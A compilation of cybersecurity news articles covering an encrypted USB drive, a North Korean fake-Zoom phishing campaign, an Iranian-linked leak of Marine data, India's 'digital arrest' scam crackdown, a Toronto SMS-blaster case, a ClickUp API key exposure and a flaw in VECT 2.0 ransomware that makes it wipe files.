Instead of relying on the host system, access control moves directly onto the hardware itself. Threats often exploit weaknesses in software-driven methods - this design helps avoid those pitfalls. With every file saved, encryption happens instantly on the Aegis Padlock DT FIPS. Even at rest, both data and access codes stay locked down through strong encoding. Firmware tampering? Not possible - Apricorn built it so updates can’t sneak in. 

That wall keeps out threats like BadUSB, which twists ordinary USB gear into tools for system breaches. Priced close to $2,000, the 32TB model enters alongside lower-capacity encrypted drives. With built-in 256-bit AES XTS encryption, it operates directly through hardware protection. Verified under FIPS 140-2 Level 2 by NIST, its design meets strict governmental requirements. Compatibility spans across Windows, Linux, macOS, Android, and ChromeOS - no extra software needed. Despite higher cost, access remains smooth on multiple platforms out of the box. 

Despite limitations in certain setups, the device works reliably where standard encryption methods fail - think medical scanners, factory machines, isolated storage units, or built-in controllers. Transfer rates reach 5 gigabits per second thanks to a USB 3.2 Gen 1 connection. Inside, vital parts are shielded by a dense epoxy layer, resisting drops, impacts, and deliberate interference. Built tough, it handles rough conditions without compromising security. 

Even with strong built-in protections, the device cannot block all digital threats. Though separating encryption and login checks from the host machine lowers infection chances, firms have to protect where the drive is kept. Should someone get hold of the unit physically, how it's managed day-to-day matters as much as its coded defenses. Firms relying on this tool must enforce clear rules for where it's stored, who can reach it, and which verified machines link to it. 

Security hardware gains traction amid rising digital risks, driven by frequent attacks on weak software defenses and leaked login data. A surge in complex breaches pushes companies to adopt built-in protection methods instead of relying solely on traditional programs. This move reflects deeper changes across sectors aiming to reduce exposure through physical safeguards. Growing reliance on embedded tools marks a departure from older models dependent on patch-prone applications.

North Korean Hackers Hack US Crytpo Executives in Just Five Minutes

 

About Arctic Wolf 


Cybersecurity experts at Arctic Wolf have disclosed information about an advanced campaign attacking North American Web3 and cryptocurrency organizations. State-sponsored group BlueNoroff launched the attack campaign, it is a financially motivated gang associated with the infamous North Korean Lazarus Group. The aim is to make persistent access on the victim device.  

The gang does this by fooling the victim into deploying malware on the systems; however, their tactic is quite advanced.  

The discovery 


Arctic Wolf found an active malicious intrusion in which the threat actor used spear-phishing to send an altered Calendly calendar invite with a typo-squatted Zoom link while posing as a respectable person in the Fintech legal industry. When the victim clicked the link, they were shown a phony Zoom meeting interface that simultaneously launched a ClickFix-style clipboard injection attack and secretly exfiltrated their live camera feed to use as a lure in subsequent attacks. 

After that, information was stolen from the victim's device and browsers via a multi-stage credential extraction pipeline that concentrated on cryptocurrency wallet extensions.v Now enters ClickFix 

While launching the attack campaign, the hackers use real, high-profile people from the Web3 world, create fake headshots (that look real) via ChatGPT, and generate animated videos via Adobe Premiere Pro. 

After this, the hackers would make a fake Zoom video call website similar to the actual Zoom call page, and would show the video to make it all look real.  

Attack tactic 


After this, BlueNoroff gang would invite the actual victim via Calendly, six months prior (to make it all look real and convincing) as prominent people are busy.  

Once the victim opens the Zoom link, they see the usual: a video call webpage with the user on the other side moving and acting like they are real people (remember they are all fake sem-animated video)but, after eight seconds on call, a notification comes up, saying their “SDK is deprecated” and showing users “Update Now” option. 

“The technical execution chain in this campaign is both efficient and operationally disciplined. From initial URL click to full system compromise, including C2 establishment, Telegram session theft, browser credential harvesting, and persistence, the attacker completed in under five minutes,” Arctic Wolf said.

U.S. Marines Reportedly Targeted by Iranian-Linked Hackers in New Data Exposure Incident

 



Iran-linked hacking group Handala has allegedly leaked personal information belonging to thousands of U.S. Marines deployed across the Persian Gulf region, shortly after American military personnel in the Middle East began receiving threatening messages from the group.

According to posts published on Handala’s website, the hackers claim to have released the names and phone numbers of 2,379 U.S. Marines as proof of what they described as their “intelligence superiority.” The group further claimed that the exposed information represents only a small sample from a much larger collection of data allegedly tied to American military personnel stationed in the region.

Handala asserted that it possesses additional details related to military members and their families, including home addresses, movement patterns, military base affiliations, commuting routines, shopping behavior, and other personal activities. These claims have not been independently verified by U.S. authorities.

The alleged leak surfaced days after several U.S. service members reportedly received threatening WhatsApp messages warning that they were under surveillance. The messages referenced Iranian drone and missile systems and attempted to intimidate military personnel by claiming their identities and movements were being tracked. Similar threatening communications believed to be linked to Handala were also reportedly sent to civilians in Israel earlier this week, suggesting a broader psychological and cyber influence campaign connected to escalating tensions in the Middle East.

Since the regional conflict involving Iran, Israel, and the United States intensified earlier this year, Handala has repeatedly claimed responsibility for several high-profile cyber incidents. Last month, the group allegedly leaked hundreds of emails said to have originated from the personal Gmail account of Kash Patel. The hackers have also been linked to a cyberattack targeting medical technology company Stryker, an operation that reportedly resulted in data being erased from tens of thousands of employee devices globally.

However, questions remain regarding the authenticity and quality of the newly leaked Marine data. An analysis of the published sample reportedly identified multiple inconsistencies, including incomplete phone numbers and entries that appeared to contain military contract identifiers rather than personal names. Several listed numbers reportedly connected only to automated voicemail systems.

In a limited number of cases, voicemail names reportedly matched information included in the leak. One individual contacted by reporters allegedly confirmed their identity before ending the call, while others declined to comment or redirected inquiries to military public affairs officials.

U.S. Central Command referred media questions regarding the incident to the Naval Criminal Investigative Service, which had not publicly commented on the matter at the time of reporting.

The incident comes amid growing concerns over cyber-enabled psychological operations targeting military personnel and their families. Earlier this month, Navy Secretary John Phelan urged sailors to strengthen the security of their mobile devices and social media accounts amid concerns over phishing attacks and malicious online activity. In an internal warning, he noted that threat actors may attempt to manipulate military personnel into opening harmful files or clicking malicious links designed to compromise personal accounts and devices.

Handala publicly portrays itself as a pro-Palestinian hacktivist organization. However, multiple cybersecurity firms and recent assessments from the U.S. Department of Justice have alleged that the group operates as a front tied to Iran’s Ministry of Intelligence and Security (MOIS).

Cybersecurity experts note that modern cyber campaigns increasingly combine data leaks, online intimidation, and misinformation tactics to create psychological pressure rather than relying solely on technical disruption. Analysts also caution that hacker groups sometimes exaggerate the scale or sensitivity of stolen data to amplify fear and media attention.

Although U.S. authorities have previously seized domains associated with Handala, the group continues to remain active by turning to new websites and communication platforms, including Telegram, allowing it to sustain its cyber and propaganda operations online.

Investigation Uncovers Thousands of Accounts Tied to Digital Arrest Fraud Networks

 

Indian authorities have launched a massive enforcement response to the escalation of extortion and impersonation fraud resulting from cyber technology. The government informed the Supreme Court in January 2026 that over 9,400 WhatsApp accounts linked to so-called "digital arrest" scams had been banned following a focused 12-week operation. 

Organizing and implementing a coordinated crackdown on organized fraud networks, in partnership with government agencies, reflects a growing concern about organizations exploiting communication platforms to impersonate law enforcement and regulatory authorities in cybercrime campaigns that are financially motivated. 

The WhatsApp countermeasure strategy consists of a combination of behavioural detection technologies and intelligence-driven monitoring systems. In addition to logo-matching capability, account name logging, large language model-based scam pattern analysis, and a repeat offender database, WhatsApp has implemented a combination of these technologies in its countermeasure strategy, in order to identify and disrupt evolving fraud infrastructures. 

Attorney General Venkataramani explained the government's position before the apex court by stating that the enforcement measures and account suspensions were documented in the detailed status report that the Indian Cybercrime Coordination Centre (I4C) under the Ministry of Home Affairs submitted on February 9th. This submission was made to comply with Supreme Court directives aimed at curbing the rapid increase in digital arrest fraud in the country that were issued on February 9. 

Chief Justice Surya Kant's bench is monitoring the case, which was previously brought up suo motu by another bench, which had taken notice of escalating online financial crimes involving impersonation-based extortion schemes and fraudulent virtual detentions. 

The court, as part of a wider institutional response, directed key regulatory and infrastructure agencies, such as the Reserve Bank of India and the Department of Telecommunications, to develop a unified operational framework for victim compensation and cyber fraud response mechanisms, signaling an emerging policy push towards regulating digital risk and mitigation of financial fraud between agencies. It has been reported that the case relates to a coordinated fraud operation that involves impersonating law enforcement officials to manipulate victims into believing that they are under active investigation. 

The accused individuals allegedly used digital communication platforms to fabricate fear, urgency, and intimidation against potential victims. A former bank official has been arrested along with two suspected associates who were allegedly involved in the execution of the scam infrastructure with the Central Bureau of Investigation. These "digital arrest" schemes typically involve prolonged voice or video interactions that isolate target groups from external verification channels. 

As a result, fraudsters remain psychologically in control while coercing victims to transfer funds in the guise of legal clearances, compliance verifications, or settlements. In light of the involvement of a banking insider, investigators have intensified their investigation into the potential misuse of financial systems, as they examine whether privileged access to transaction mechanisms or sensitive financial data permitted illegal funds to be transferred and withdrawn rapidly. 

Forensic analysis of communication logs, transactional paths, and digital evidence is being conducted as part of the ongoing investigation to map the criminal ecosystem supporting the operation as well as identify additional facilitators, beneficiaries, and individuals affected by it. According to law enforcement agencies, digital arrest frauds are on the rise across the nation, incorporating social engineering, identity appropriation, and coordinated cyber-enabled deception techniques to exploit victims.

In addition, legitimate government agencies will never ask for financial payments in order to prevent criminal or legal action from occurring. When investigative inputs were shared by the Indian Cyber Crime Coordination Centre, the Ministry of Electronics and Information Technology, and the Department of Telecommunications, enforcement efforts intensified, leading to a broader intelligence-driven disruption campaign that targeted the ecosystem of organised digital fraud. 

According to WhatsApp, government-reported accounts are not handled as isolated abuse incidents, but rather are analyzed as behavioural indicators to identify interconnected criminal infrastructures and their associated threat networks.

Nearly 3,800 accounts were originally flagged by the government, but the company's internal detection system greatly expanded the scope of the investigation, leading to the removal of thousands of additional accounts associated with suspected scam activities. 

In conjunction with a parallel preventive strategy, the platform has implemented several product-level safeguards in an effort to intercept fraud attempts during early contact stages of the fraud process. Alerts for suspicious first-time interactions, visibility indicators that provide account age information for unknown users, suppression of profile photographs when high-risk conversations occur, and expanded caller identification features are included in this strategy. 

The company expressed confidence that these interventions could help reduce the number of digital arrest frauds. However, it acknowledged that many operations are supported by cross-border criminal infrastructure, unauthorised payment channels, and external communication networks outside of its direct control, and stressed that multijurisdictional law enforcement actions would be required to prevent long-term disruptions. 

Aside from its submission to the Supreme Court, the Center also proposed the establishment of an extensive multi-agency enforcement framework designed to strengthen telecom verification systems, financial fraud response protocols, and cybercrime prevention systems nationally. Following consultation with regulatory and enforcement stakeholders, the report urged the court to direct telecommunications, electronics, and information technology authorities, as well as the Reserve Bank of India to establish standardized and time-bound safeguards against digital arrest scams. 

An important element of the proposal is the rapid implementation of Telecommunications (User Identification) Rules along with a Biometric Identity Verification System in order to establish nationwide traceability and visibility into SIM issuance processes. 

The Department of Telecommunications has instructed telecom service providers to enforce stricter compliance measures and Point of Sale vendors that activate SIM cards are required to meet enhanced verification and accountability requirements in accordance with a circular dated August 31, 2023 issued by the Department of Telecommunications.

Further, the report recommends that suspicious SIM cards associated with cybercrime investigations are blocked immediately. It also recommends that subscriber activation records and point of sale data be shared in real time with investigative agencies in order to improve the effectiveness of emergency response operations. 

During the course of monitoring the rapid expansion of digital arrest scams across India, the Supreme Court requested coordinated national action and periodic status updates from the enforcement and regulatory bodies responsible for the mitigation of cybercrime in India.

One of India's most significant institutional responses to digital arrest fraud has been the coordinated crackdown, reflecting the increasing convergence of cybercrime enforcement, telecommunication regulation, financial oversight, and platform-level security interventions, as well as the increasing threat of digital arrest frauds.

Investigative agencies continue to trace broader criminal networks, as well as regulatory agencies implementing stricter identity verification and fraud prevention guidelines, authorities believe sustained inter-agency coordination is crucial in disrupting organized scam ecosystems across digital communication networks and financial infrastructures. 

Moreover, these developments suggest that India’s cybercrime response strategy has also evolved, in which technology platforms, telecom operators, banks, and law enforcement agencies are collaborating in an effort to counter increasingly sophisticated forms of cybercrime-enabled financial fraud.

Canada's First SMS Blaster Bust: 3 Arrested in Toronto Cybercrime Crackdown

 

Toronto police have exposed a first-of-its-kind SMS blaster cybercrime case in Canada, where investigators say three men used a rogue device to mimic a cell tower and push fake texts to nearby phones. The operation, known as Project Lighthouse, reportedly ran across the Greater Toronto Area for months before police arrested the suspects and seized multiple devices. 

The core issue is the use of an SMS blaster, a tool that can trick smartphones into connecting to a fake cellular signal. Once connected, the device can send fraudulent messages that look like they come from banks, delivery services, or other trusted organizations, often leading victims to phishing sites that steal passwords or banking details. Police also said the tactic creates a wider network risk because it can interrupt legitimate mobile connections. 

Investigators say the threat was not small in scale. Reports indicate tens of thousands of devices may have connected to the rogue equipment over several months, and police recorded more than 13 million network disruptions linked to the operation. That disruption is especially serious because it can interfere with emergency access, including the ability to reach 911.

The arrests show how quickly cybercrime is evolving from online-only scams into hybrid attacks that combine physical devices, mobility, and social engineering. Police charged the three suspects with a combined 44 offences, including fraud, mischief, personation, and unauthorized interception-related crimes. The case is being treated as Canada’s first confirmed investigation of this kind, which makes it a warning sign for other cities and countries. 

The broader lesson is that mobile phones can be vulnerable even when users do not click anything suspicious. If a rogue tower is nearby, the attack can start at the network level and then move into fake texts, credential theft, and financial fraud. For readers, the main takeaway is to be cautious with urgent SMS links, verify messages through official apps or websites, and treat unexpected texts from banks or government services as potentially malicious.

ClickUp API Key Exposure Leaves Corporate and Government Email Data Public for Over a Year

 

A previously unnoticed weakness in ClickUp’s web infrastructure sat undetected - exposing private data due to an embedded API key left visible on its public site. For over twelve months, access to internal records remained possible because safeguards were missing at a basic level. Emails tied to businesses and official agencies could be pulled by outside parties; no login required. This gap emerged not from complex hacking but from routine coding oversights ignored during deployment. Hidden credentials like these often escape review until examined closely. Months passed before scrutiny revealed what should have been caught earlier. Security gaps of this kind stem less from advanced threats and more from everyday lapses repeated across teams. 

Open talk about the problem began when security analyst Impulsive shared findings showing the leaked credential sat inside a JavaScript file served by ClickUp's site, even before login steps occurred. Since code running in browsers can always be seen, grabbing the API key took little effort and allowed contact with internal servers. Without needing any special access, one basic query allegedly pulled close to a thousand emails plus vast numbers of hidden development settings from the system. The study showed that 959 employee email addresses were part of the leaked data, tied to staff in large companies and public institutions spanning various locations. 

About 3,165 feature flags also turned up in the exposure - visible without restriction. Hidden inside what looks like routine code, these flags might expose how teams test software, plan releases, roll out new tools, or shape future updates. Because of that, malicious actors might mine them to craft deceptive emails, manipulate individuals through tailored messages, or collect insights on rivals’ progress. Surprisingly useful intel often hides where it seems least likely. Early in 2025, news of the exposure surfaced - yet by April 2026, it still hadn’t been fixed, stretching out the time hackers could act. Because access stayed open so long, experts say attackers gained more chances to try breaking in using stolen login details, fake identities, or personalized emails targeting workers linked to the affected websites. 

What happened shows a wider issue for groups depending on cloud-based services. Though easy to avoid, fixed login details remain common in today’s coding practices. When secret access tokens appear in open-source repositories, bots usually find them fast - sometimes in under sixty seconds. Even low-level access codes can lead to large data leaks if internal systems lack strong verification rules. Rotating API keys often helps lower exposure over time. Client-side apps without embedded secrets tend to withstand attacks better. Strict limits on backend access form another layer of defense. 

Protection against phishing gains strength when using tools like DMARC, SPF, or DKIM. Unusual logins catch attention faster with constant tracking. Exposed domains become visible through active threat data streams. Security improves not by one fix alone, but steady adjustments across systems. A quiet mistake lingered unseen within ClickUp's system, revealing data widely before detection. When operations move into shared online environments, oversight gaps often emerge - making careful monitoring essential. Security lapses like this highlight growing pressure on organizations to act earlier, respond smarter, stay alert longer.

VECT 2.0 Ransomware Bug Turns Malware Into a Permanent Data Wiper

Cybersecurity researchers have uncovered a major flaw in the VECT 2.0 ransomware that causes the malware to permanently destroy large files instead of properly encrypting them, making recovery impossible even if victims decide to pay a ransom.

The ransomware operation has reportedly been promoted on newer versions of BreachForums, where the group invited users to join its affiliate program. Interested participants were allegedly given access keys through private messages.

VECT operators also announced a collaboration with TeamPCP, the threat actor linked to recent supply-chain attacks targeting Trivy, LiteLLM, Telnyx, and even the European Commission. According to the announcement, the partnership aimed to exploit victims affected by those supply-chain breaches by deploying ransomware payloads and expanding attacks against additional organizations.

Critical Encryption Flaw Discovered

Researchers found that VECT 2.0 contains a serious issue in how it manages encryption nonces during the file-encryption process. Although the ransomware was designed to speed up encryption for large files, the implementation accidentally overwrites nonce data during each encryption cycle.

Because the malware uses the same memory buffer repeatedly for nonce generation, every newly created nonce replaces the previous one. Once the encryption process is completed, only the final nonce remains stored and is written to disk.

This mistake means that only the last 25% of an affected file can potentially be recovered, while the remaining portions become permanently inaccessible due to the missing nonces.

The problem becomes even more severe because the lost nonces are not sent back to the attackers either. As a result, even the ransomware operators themselves would be unable to decrypt victim files after payment.

Security researchers warned that the flaw effectively transforms the ransomware into a destructive data wiper, particularly in enterprise environments where most valuable assets exceed the malware’s file-size threshold.

“At a threshold of only 128 KB, smaller than a typical email attachment or office document, what the code classifies as a large file encompasses not just VM disks, databases, and backups, but routine documents, spreadsheets, and mailboxes. In practice, almost nothing a victim would care to recover falls below this boundary,” Check Point says.

Researchers also confirmed that the same nonce-management vulnerability exists across all VECT 2.0 variants, including Windows, Linux, and ESXi versions, meaning the irreversible file destruction behavior impacts every platform supported by the ransomware.